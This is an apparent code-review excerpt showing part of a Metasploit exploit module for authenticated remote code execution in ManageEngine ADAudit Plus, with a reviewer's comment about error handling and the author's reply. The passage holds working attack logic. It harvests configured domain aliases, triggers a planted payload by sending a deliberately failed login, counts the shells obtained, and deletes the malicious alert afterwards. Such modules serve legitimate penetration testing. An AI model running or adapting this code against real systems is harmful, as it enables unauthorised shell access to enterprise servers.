modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,526 @@
+        fail_with(Failure::Unknown, target_check_msg)
+      end
+      target_check_res = target_check_results['server_response']
+
+      # in order to trigger the final payload in the exploit method, we will need to send an authentication request to ADAudit Plus with incorrect active directory credentials
+      # if the user didn't provide an active directory domain, we can try to extract the FQDN for a configured domain from the server response
+      domain_alias_results = adaudit_plus_grab_domain_aliases(target_check_res.body)
+      domain_alias_msg = domain_alias_results['message']
+      if domain_alias_results['status'] == adaudit_plus_status::NO_MATCH
+        fail_with(Failure::NotVulnerable, domain_alias_msg)
+      end
+
+      domain_aliases = domain_alias_results['domain_aliases']
+      if auth_domain == 'ADAuditPlus Authentication' || domain_aliases&.include?(auth_domain)
+        vprint_status(domain_alias_msg)
+        @domain_alias = domain_aliases.first
+        print_status("Using configured authentication domain alias #{@domain_alias}.")
+      else
+        print_status(domain_alias_msg)
+        fail_with(Failure::BadConfig, "The provided AUTH_DOMAIN #{auth_domain} does not match the configured authentication domain(s).")
+      end
+    end
+
+    print_status("Attempting to trigger the payload via an authentication attempt for domain #{@domain_alias} using incorrect credentials.")
+    login_results = adaudit_plus_login(@domain_alias, rand_text_alphanumeric(5..8), rand_text_alphanumeric(8..12), true)
+    login_msg = login_results['message']
+    case login_results['status']
+    when adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY
+      fail_with(Failure::Unknown, "#{login_msg} You can try to manually trigger the payload via a failed login attempt for the #{@domain_alias} domain.")
+    when adaudit_plus_status::NO_ACCESS
+      print_status("Received expected reply when trying to trigger the payload. Let's hope we get a shell...")
+    else
+      print_warning('Received unexpected reply when trying to trigger the payload. The module will continue but exploitation will likely fail.')
+    end
+
+    @pwned = 0 # used to keep track of successful exploitation and the number of shells we get in cleanup and on_new_session
+  end
+
+  def cleanup
+    return unless @alert_name # this should only run if we actually created an alert
+
+    if @pwned == 0
+      print_error('Failed to obtain a shell. You could try increasing the WfsDelay value')
+    end
+    cookie_jar.clear
+    login_results = adaudit_plus_login(auth_domain, username, password, true)
+    case login_results['status']
+    when adaudit_plus_status::SUCCESS, adaudit_plus_status::NO_MATCH
+      delete_alert(login_results['adapcsrf_cookie'])
+    else
+      print_warning('Failed to authenticate in order to perform cleanup. Manual cleanup required.')
+    end
```

Comment:
This will need to be updated to handle CONNECTION_FAILED and UNEXPECTED_REPLY status codes which are not authentication failures.

Reply:
agreed. I expanded the case statement now